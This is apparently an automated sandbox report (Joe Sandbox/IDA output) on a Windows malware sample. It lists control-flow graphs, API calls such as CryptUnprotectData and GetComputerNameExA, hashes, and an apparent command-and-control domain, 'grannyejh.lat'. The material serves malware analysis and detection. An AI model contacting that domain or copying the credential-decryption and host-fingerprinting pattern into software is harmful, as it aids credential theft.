80->77 82 436fb9-436fbc 80->82 82->77
                                                                                                                                      APIs
                                                                                                                                      • CoCreateInstance.OLE32(0044068C,00000000,00000001,0044067C), ref: 00436BF0
                                                                                                                                      • SysAllocString.OLEAUT32(10401E4F), ref: 00436C79
                                                                                                                                      • CoSetProxyBlanket.COMBASE(CDC9F5CC,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00436CB6
                                                                                                                                      • SysAllocString.OLEAUT32(02B000B8), ref: 00436D1F
                                                                                                                                      • SysAllocString.OLEAUT32(105A1E4E), ref: 00436DE0
                                                                                                                                      • VariantInit.OLEAUT32(QJKL), ref: 00436E4B
                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 00436FD2
                                                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 00436FF3
                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 00436FF9
                                                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 0043700A
                                                                                                                                      • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00437045
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2923052938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: String$AllocFree$Variant$BlanketClearCreateInformationInitInstanceProxyVolume
                                                                                                                                      • String ID: n)`$)MNO$0j6l$3b<d$7v.H$8e$MN$QJKL$vW}Z$zW}Z${@8#$
                                                                                                                                      • API String ID: 2573436264-1928758774
                                                                                                                                      • Opcode ID: e5f7feb958a2fba7e1dba6e17a6dafd2a0e28881f2d43109f9219ad7023b5c9c
                                                                                                                                      • Instruction ID: 6c0b44996c03eb0e40192bf62832c839fb6e79de9a0b651ada1dc03bcec214e4
                                                                                                                                      • Opcode Fuzzy Hash: e5f7feb958a2fba7e1dba6e17a6dafd2a0e28881f2d43109f9219ad7023b5c9c
                                                                                                                                      • Instruction Fuzzy Hash: 79120D72A08351ABD310CF64C880B6BBBE5EFC9314F15892DE9D5AB390D779D805CB86

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 93 42ba22-42ba7f call 43cc40 97 42ba80-42bacb 93->97 97->97 98 42bacd-42bad7 97->98 99 42baeb-42baf8 98->99 100 42bad9 98->100 102 42bafa-42bb01 99->102 103 42bb1b-42bb88 call 43cc40 GetComputerNameExA 99->103 101 42bae0-42bae9 100->101 101->99 101->101 105 42bb10-42bb19 102->105 108 42bb90-42bbcf 103->108 105->103 105->105 108->108 109 42bbd1-42bbdb 108->109 110 42bbfd-42bc04 109->110 111 42bbdd-42bbef 109->111 113 42bc07-42bc14 110->113 112 42bbf0-42bbf9 111->112 112->112 114 42bbfb 112->114 115 42bc16-42bc1f 113->115 116 42bc2b-42bc7f GetComputerNameExA 113->116 114->113 117 42bc20-42bc29 115->117 118 42bc80-42bcaf 116->118 117->116 117->117 118->118 119 42bcb1-42bcbb 118->119 120 42bcdb-42bce8 119->120 121 42bcbd-42bcc4 119->121 122 42bcea-42bcf1 120->122 123 42bd0b-42bd5a 120->123 124 42bcd0-42bcd9 121->124 125 42bd00-42bd09 122->125 127 42bd60-42bdaa 123->127 124->120 124->124 125->123 125->125 127->127 128 42bdac-42bdb6 127->128 129 42bdcb-42bdd8 128->129 130 42bdb8-42bdbf 128->130 132 42bdda-42bde1 129->132 133 42bdfb-42be56 call 43cc40 129->133 131 42bdc0-42bdc9 130->131 131->129 131->131 134 42bdf0-42bdf9 132->134 138 42be60-42be9f 133->138 134->133 134->134 138->138 139 42bea1-42beab 138->139 140 42becd 139->140 141 42bead-42bebb 139->141 143 42bed4-42bee4 140->143 142 42bec0-42bec9 141->142 142->142 144 42becb 142->144 145 42beea-42bef1 143->145 146 42c00e-42c054 143->146 144->143 147 42bf00-42bf0d 145->147 148 42c060-42c08c 146->148 149 42bf20-42bf26 147->149 150 42bf0f-42bf14 147->150 148->148 151 42c08e-42c09b 148->151 153 42bf50-42bf5c 149->153 154 42bf28-42bf2b 149->154 152 42bfc0-42bfc4 150->152 155 42c0bb-42c0be call 42f810 151->155 156 42c09d-42c0a4 151->156 160 42bfc6-42bfcc 152->160 157 42bfd8-42bfe0 153->157 158 42bf5e-42bf61 153->158 154->153 161 42bf2d-42bf42 154->161 164 42c0c3-42c0e3 155->164 162 42c0b0-42c0b9 156->162 157->160 166 42bfe2-42bfe5 157->166 158->157 163 42bf63-42bfb5 158->163 160->146 165 42bfce-42bfd0 160->165 161->152 162->155 162->162 163->152 165->147 167 42bfd6 165->167 168 42bfe7-42c008 166->168 169 42c00a-42c00c 166->169 167->146 168->152 169->152
                                                                                                                                      APIs
                                                                                                                                      • FreeLibrary.KERNEL32(?), ref: 0042BB25
                                                                                                                                      • GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 0042BB61
                                                                                                                                      • GetComputerNameExA.KERNELBASE(00000005,?,00000200), ref: 0042BC46
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2923052938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ComputerName$FreeLibrary
                                                                                                                                      • String ID: 6$<]$#v
                                                                                                                                      • API String ID: 2243422189-1090510124
                                                                                                                                      • Opcode ID: 621842a93ff8ced0cfeaf9eb3e87c0fe3c4dcd6c2d54c0bdc1c65954fa12966e
                                                                                                                                      • Instruction ID: 1cec2e3dc27d3c0ec5f885a97094761a0063ba2d9d4689993bd0c37c1048aab9
                                                                                                                                      • Opcode Fuzzy Hash: 621842a93ff8ced0cfeaf9eb3e87c0fe3c4dcd6c2d54c0bdc1c65954fa12966e
                                                                                                                                      • Instruction Fuzzy Hash: 2EE1013160C3D18AE7358F3598517ABBBD2EFD6304F5888AEC0C997283DB794446CB66

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 186 415211-415244 call 4080e0 call 43d700 191 4152b1-4152b7 call 4080e0 186->191 192 415290-4152a4 call 401000 186->192 193 4152c0 186->193 194 4152c2-4152e2 186->194 195 415507 186->195 196 415519-415583 186->196 197 41524b-415278 call 4080d0 call 43d7b0 186->197 198 4152ba-4152bf 186->198 199 41541d-41541f 186->199 200 41527f 186->200 191->198 192->191 193->194 203 4152f0-415323 194->203 205 415590-4155cc 196->205 197->191 197->192 197->193 197->194 197->195 197->196 197->198 197->199 197->200 198->193 204 415420-415426 199->204 200->192 203->203 209 415325-41532d 203->209 204->204 210 415428-41545b 204->210 205->205 211 4155ce-4155f2 call 401db0 205->211 214 41536d-4153cf call 401a70 209->214 215 41532f-41533f 209->215 216 415462 210->216 217 41545d-415460 210->217 211->196 229 41550d-415516 call 4080e0 211->229 230 41561f-415626 211->230 231 4153d0-4153f4 214->231 221 415340-415347 215->221 222 415463-415473 216->222 217->216 217->222 225 415350-415356 221->225 226 415349-41534c 221->226 227 415475-415478 222->227 228 41547a 222->228 225->214 234 415358-41536a call 43b1c0 225->234 226->221 233 41534e 226->233 227->228 235 41547b-41549b call 4080d0 227->235 228->235 229->196 236 415644-415690 call 41c990 * 2 230->236 231->231 239 4153f6-415416 call 401db0 231->239 233->214 234->214 235->230 246 4154a1-415500 call 43cc40 CryptUnprotectData 235->246 253 415630-41563e 236->253 254 415692-4156a9 call 41c990 236->254 239->195 239->196 239->199 251 415719-415723 239->251 246->195 246->251 255 415730-415739 251->255 253->236 253->246 254->253 262 4156ab-4156d4 254->262 255->255 257 41573b-41573e 255->257 258 415872 257->258 259 415744-415749 257->259 261 415875-4158af call 4080d0 258->261 259->261 267 4158b0-4158e6 261->267 262->253 264 4156da-4156f4 call 41c990 262->264 264->253 270 4156fa-415714 264->270 267->267 269 4158e8-4158f0 267->269 271 415911-415921 269->271 272 4158f2-4158f7 269->272 270->253 274 415941-415952 call 408a60 271->274 275 415923-41592a 271->275 273 415900-41590f 272->273 273->271 273->273 278 415957 274->278 276 415930-41593f 275->276 276->274 276->276 278->278
                                                                                                                                      APIs
                                                                                                                                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004154F7
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2923052938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CryptDataUnprotect
                                                                                                                                      • String ID: &*82$<9++$]YA
                                                                                                                                      • API String ID: 834300711-3660485890
                                                                                                                                      • Opcode ID: b615abce1cdbb1baa4d73b894295c0cc9965438dc8952df06c44a1f80821f82c
                                                                                                                                      • Instruction ID: f8006e6d85f6fd1f6e886fc3354e934eae3bf83ba45ce965c2848f49bcc84732
                                                                                                                                      • Opcode Fuzzy Hash: b615abce1cdbb1baa4d73b894295c0cc9965438dc8952df06c44a1f80821f82c
                                                                                                                                      • Instruction Fuzzy Hash: 3EE1F1B16087818FC721DF28C8957EBB7E1BFD5314F18892DE4D987392E73888458B56

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 410 42ba1d-42bb36 call 43cc40 413 42bb3b-42bb88 GetComputerNameExA 410->413 414 42bb90-42bbcf 413->414 414->414 415 42bbd1-42bbdb 414->415 416 42bbfd-42bc04 415->416 417 42bbdd-42bbef 415->417 419 42bc07-42bc14 416->419 418 42bbf0-42bbf9 417->418 418->418 420 42bbfb 418->420 421 42bc16-42bc1f 419->421 422 42bc2b-42bc7f GetComputerNameExA 419->422 420->419 423 42bc20-42bc29 421->423 424 42bc80-42bcaf 422->424 423->422 423->423 424->424 425 42bcb1-42bcbb 424->425 426 42bcdb-42bce8 425->426 427 42bcbd-42bcc4 425->427 428 42bcea-42bcf1 426->428 429 42bd0b-42bd5a 426->429 430 42bcd0-42bcd9 427->430 431 42bd00-42bd09 428->431 433 42bd60-42bdaa 429->433 430->426 430->430 431->429 431->431 433->433 434 42bdac-42bdb6 433->434 435 42bdcb-42bdd8 434->435 436 42bdb8-42bdbf 434->436 438 42bdda-42bde1 435->438 439 42bdfb-42be56 call 43cc40 435->439 437 42bdc0-42bdc9 436->437 437->435 437->437 440 42bdf0-42bdf9 438->440 444 42be60-42be9f 439->444 440->439 440->440 444->444 445 42bea1-42beab 444->445 446 42becd 445->446 447 42bead-42bebb 445->447 449 42bed4-42bee4 446->449 448 42bec0-42bec9 447->448 448->448 450 42becb 448->450 451 42beea-42bef1 449->451 452 42c00e-42c054 449->452 450->449 453 42bf00-42bf0d 451->453 454 42c060-42c08c 452->454 455 42bf20-42bf26 453->455 456 42bf0f-42bf14 453->456 454->454 457 42c08e-42c09b 454->457 459 42bf50-42bf5c 455->459 460 42bf28-42bf2b 455->460 458 42bfc0-42bfc4 456->458 461 42c0bb-42c0be call 42f810 457->461 462 42c09d-42c0a4 457->462 466 42bfc6-42bfcc 458->466 463 42bfd8-42bfe0 459->463 464 42bf5e-42bf61 459->464 460->459 467 42bf2d-42bf42 460->467 470 42c0c3-42c0e3 461->470 468 42c0b0-42c0b9 462->468 463->466 472 42bfe2-42bfe5 463->472 464->463 469 42bf63-42bfb5 464->469 466->452 471 42bfce-42bfd0 466->471 467->458 468->461 468->468 469->458 471->453 473 42bfd6 471->473 474 42bfe7-42c008 472->474 475 42c00a-42c00c 472->475 473->452 474->458 475->458
                                                                                                                                      APIs
                                                                                                                                      • GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 0042BB61
                                                                                                                                      • GetComputerNameExA.KERNELBASE(00000005,?,00000200), ref: 0042BC46
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2923052938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ComputerName
                                                                                                                                      • String ID: 6
                                                                                                                                      • API String ID: 3545744682-498629140
                                                                                                                                      • Opcode ID: 35fb6bd53f269a9976b984b5939a46a6e00831035cf16ba3f28e60a547999d65
                                                                                                                                      • Instruction ID: 38dc4924b77cc4a343e80aef5c707578bfef320e8ba28539a4aee03f9be0fd01
                                                                                                                                      • Opcode Fuzzy Hash: 35fb6bd53f269a9976b984b5939a46a6e00831035cf16ba3f28e60a547999d65
                                                                                                                                      • Instruction Fuzzy Hash: 58E1152160C3D18AD735CF3998917ABBBD1EF96304F58896EC0C987383DB789446CB96

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 608 40d76f-40d79f call 4311a0 call 4094d0 CoUninitialize 613 40d7a0-40d7cc 608->613 613->613 614 40d7ce-40d7e9 613->614 615 40d7f0-40d819 614->615 615->615 616 40d81b-40d85f 615->616 617 40d860-40d88f 616->617 617->617 618 40d891-40d89e 617->618 619 40d8a0-40d8a3 618->619 620 40d8bb-40d8c3 618->620 621 40d8b0-40d8b9 619->621 622 40d8c5-40d8c9 620->622 623 40d8dd 620->623 621->620 621->621 624 40d8d0-40d8d9 622->624 625 40d8e0-40d8eb 623->625 624->624 626 40d8db 624->626 627 40d8fb-40d906 625->627 628 40d8ed-40d8ef 625->628 626->625 630 40d908-40d909 627->630 631 40d91b-40d923 627->631 629 40d8f0-40d8f9 628->629 629->627 629->629 632 40d910-40d919 630->632 633 40d925-40d926 631->633 634 40d93b-40d947 631->634 632->631 632->632 635 40d930-40d939 633->635 636 40d961-40da22 634->636 637 40d949-40d94b 634->637 635->634 635->635 639 40da30-40da78 636->639 638 40d950-40d95d 637->638 638->638 640 40d95f 638->640 639->639 641 40da7a-40daa1 639->641 640->636 642 40dab0-40db44 641->642 642->642 643 40db4a-40db68 call 40b540 642->643 645 40db6d-40db87 643->645
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2923052938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Uninitialize
                                                                                                                                      • String ID: w@1$grannyejh.lat
                                                                                                                                      • API String ID: 3861434553-2405751641
                                                                                                                                      • Opcode ID: 5a6ede36d1b718381f70dc6588da170c6f117ba54a0749e40254c653adb2b4a0
                                                                                                                                      • Instruction ID: 288dab4d58a3fd278ea9672a9f37133dfa3051a537b2e867f60eae80fc95dafa
                                                                                                                                      • Opcode Fuzzy Hash: 5a6ede36d1b718381f70dc6588da170c6f117ba54a0749e40254c653adb2b4a0
                                                                                                                                      • Instruction Fuzzy Hash: BFB123B5504B818FD715CF6AC490622BFE2FF92314B1985AEC4D29F7A2C778E806CB54
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2923052938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID: @$SRQP
                                                                                                                                      • API String ID: 2994545307-4103095672
                                                                                                                                      • Opcode ID: 8d391f0ae4699896911e2fdc63040c7194b95c35fcf732d27ea9fcce4b061ce9
                                                                                                                                      • Instruction ID: 520f662993bbb4e5954ca508543e934ad6b602e8f05b31c4d19d327791254f67
                                                                                                                                      • Opcode Fuzzy Hash: 8d391f0ae4699896911e2fdc63040c7194b95c35fcf732d27ea9fcce4b061ce9
                                                                                                                                      • Instruction Fuzzy Hash: 3B4104B19043009BDB148F24E84276BB7A1FFC9328F15A62DE4A95B391E738DC15878A
                                                                                                                                      APIs
                                                                                                                                      • LdrInitializeThunk.NTDLL(0043D3E8,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043B1EE
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2923052938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                      • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                      • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                                                      • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                      • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                                                                      Strings
                                                                                                                                      • 782397A2CDD031F1C683EA0F4CB0333A, xrefs: 0040CF94
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2923052938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 782397A2CDD031F1C683EA0F4CB0333A
                                                                                                                                      • API String ID: 0-3586103591
                                                                                                                                      • Opcode ID: c2416ef642491591abf17dd00908a4992512ceddfa07f6a9ada64141ddd3ac97
                                                                                                                                      • Instruction ID: b5017b68631502933e5454ec082f6ea5432ff1a9d16e454ca8222f4872775cb4
                                                                                                                                      • Opcode Fuzzy Hash: c2416ef642491591abf17dd00908a4992512ceddfa07f6a9ada64141ddd3ac97
                                                                                                                                      • Instruction Fuzzy Hash: FD512972A046028BD324CF39CC52577B7F3EF96314B18867ED056A77D6EB38A4428798
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2923052938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID: SRQP
                                                                                                                                      • API String ID: 2994545307-1594865775
                                                                                                                                      • Opcode ID: b210a77e2b88aa762e1577c6406834ecba7d95de30fd401ab2cb4ed11d2f9a86
                                                                                                                                      • Instruction ID: 989ab0c3e68e5812f3ed57fcfafc3cbcd4704314fcbfcacb7c37fac62b62a659
                                                                                                                                      • Opcode Fuzzy Hash: b210a77e2b88aa762e1577c6406834ecba7d95de30fd401ab2cb4ed11d2f9a86
                                                                                                                                      • Instruction Fuzzy Hash: 1B310834B04300AFE719AB14AC80B7BB7E5EF89714F246A2DE59597391C334FC518749
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2923052938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                      • Opcode ID: be0a5b7cff1e3ebdef9de0425327d4f69ac6013617aae73960c843f1d5268769
                                                                                                                                      • Instruction ID: 3030b71853e9339311f693463ce54af61d3d315cbfab627b3ca9803fb57fb25d
                                                                                                                                      • Opcode Fuzzy Hash: be0a5b7cff1e3ebdef9de0425327d4f69ac6013617aae73960c843f1d5268769
                                                                                                                                      • Instruction Fuzzy Hash: 06B1AD71B08B249BDB14CF25A84267BB792EFD1310FD9C53EE8859B341E638DD068399
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2923052938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: cf02f33a1b1daf24cb9931d2c77368c986719a259f34d71f5120d67179880b9b
                                                                                                                                      • Instruction ID: 5a51797baa4f70cbea165017b6113697cdba228a7bf23c75e374c08b22add460
                                                                                                                                      • Opcode Fuzzy Hash: cf02f33a1b1daf24cb9931d2c77368c986719a259f34d71f5120d67179880b9b
                                                                                                                                      • Instruction Fuzzy Hash: 3F713AB6E113119FCB14CFA8CDC269EBFB1EB84310F198179D850BB345C67899068BE5
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2923052938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 99e81324b0c1cf33e0573523311454ee194a1e1005c46ec32a071a01332caec5
                                                                                                                                      • Instruction ID: 751e2f74ea9cad05592f5d8bb9552b2fb1e8924ab4a69e6f79150cb4c6a0c79f
                                                                                                                                      • Opcode Fuzzy Hash: 99e81324b0c1cf33e0573523311454ee194a1e1005c46ec32a071a01332caec5
                                                                                                                                      • Instruction Fuzzy Hash: 655114B69042219BC7208F24DC427AB73A1FF96358F08493EF895873A1FB389944C75A

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 004087B8
                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 004087BE
                                                                                                                                      • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 004087CD
                                                                                                                                      • GetForegroundWindow.USER32(?,00000010,00000000), ref: 004087D3
                                                                                                                                        • Part of subcall function 0040B510: FreeLibrary.KERNEL32(004087F9,00000010,00000000), ref: 0040B516
                                                                                                                                        • Part of subcall function 0040B510: FreeLibrary.KERNEL32 ref: 0040B537
                                                                                                                                      • ExitProcess.KERNEL32 ref: 00408800
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2923052938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CurrentFreeLibraryProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3676751680-0
                                                                                                                                      • Opcode ID: 21bd698dd96b649f409366f4b954b77aa43a9efba90f2450923aa7d9f6643372
                                                                                                                                      • Instruction ID: efc7088809ba8cf20e2d707f0df16ced709f8c36e2f02579ccc9f0a6e44102c5
                                                                                                                                      • Opcode Fuzzy Hash: 21bd698dd96b649f409366f4b954b77aa43a9efba90f2450923aa7d9f6643372
                                                                                                                                      • Instruction Fuzzy Hash: 99E065B464030066D9507BE29D0B71836109F0670BF14143EBBC46E2DBDE7D2498857F

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 476 43aec5-43aefb 477 43af00-43af6e 476->477 477->477 478 43af70-43af7c LoadLibraryExW 477->478 479 43af83-43afac 478->479 480 43af7e 478->480 480->479
                                                                                                                                      APIs
                                                                                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000800), ref: 0043AF78
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2923052938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: LibraryLoad
                                                                                                                                      • String ID: #xz$|}~
                                                                                                                                      • API String ID: 1029625771-3181759514
                                                                                                                                      • Opcode ID: 663d1f37cba9ae336453a67d969d0eadb23e5ceb7d3a620db317f36db9321fd2
                                                                                                                                      • Instruction ID: 9d6fd7f183629d6f5671af56f8e4d61466d5997296eac2cb3b52d42b2c6829cf
                                                                                                                                      • Opcode Fuzzy Hash: 663d1f37cba9ae336453a67d969d0eadb23e5ceb7d3a620db317f36db9321fd2
                                                                                                                                      • Instruction Fuzzy Hash: FC21A17664C3058FD708DF68CC9179AB7E1EB86200F04883DA991C7395E674E50EDB5A
                                                                                                                                      APIs
                                                                                                                                      • GetUserDefaultUILanguage.KERNELBASE ref: 00433E77
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2923052938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DefaultLanguageUser
                                                                                                                                      • String ID: ]AFG
                                                                                                                                      • API String ID: 95929093-669045540
                                                                                                                                      • Opcode ID: 4679b5e216c382fe734f1540f62582b300b0f6a024146c0e33c0681eb5952257
                                                                                                                                      • Instruction ID: 5efb7c02271164443452c92132bb36d5d815bba63d7bab123c99ea9d2f26bed1
                                                                                                                                      • Opcode Fuzzy Hash: 4679b5e216c382fe734f1540f62582b300b0f6a024146c0e33c0681eb5952257
                                                                                                                                      • Instruction Fuzzy Hash: 3721A170A042948BCB29CF39DD9439E7BB25F9A304F1481EDD44EA3381CB384A858B15
                                                                                                                                      APIs
                                                                                                                                      • RtlAllocateHeap.NTDLL(?,00000000,EA,?,0041450A,00000400), ref: 00439610
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2923052938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                      • String ID: EA
                                                                                                                                      • API String ID: 1279760036-2114164354
                                                                                                                                      • Opcode ID: 3e1ceb89b250fb9d12f092212fcf4fe67dd3e46b0e81a7b895b6807b367db28a
                                                                                                                                      • Instruction ID: 072a079bc63fcf67ee4329f4ce4bd41d3d21b92436fb07c3b665bbd367ae41b4
                                                                                                                                      • Opcode Fuzzy Hash: 3e1ceb89b250fb9d12f092212fcf4fe67dd3e46b0e81a7b895b6807b367db28a
                                                                                                                                      • Instruction Fuzzy Hash: 88C04C31455120BBCA142B15EC05BCA3A549F55263F011066B045660718760AC81C6D8
                                                                                                                                      APIs
                                                                                                                                      • CoInitializeEx.OLE32(00000000,00000002), ref: 0040C72A
                                                                                                                                      • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C877
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2923052938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Initialize
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2538663250-0
                                                                                                                                      • Opcode ID: 05c4c1416ea442637c99b95b2e70e57e8ad7658d526ce65787b2e92417fc1243
                                                                                                                                      • Instruction ID: 7c48f2d6d9308c2411c64d4738aed0816c10745a2db0d8d39336d96daee36388
                                                                                                                                      • Opcode Fuzzy Hash: 05c4c1416ea442637c99b95b2e70e57e8ad7658d526ce65787b2e92417fc1243
                                                                                                                                      • Instruction Fuzzy Hash: 9541C7B4D10B40AFD370EF399A0B7137EB4AB05250F504B1EF9EA866D4E631A4198BD7
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2923052938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_NHEXQatKdE.jbxd
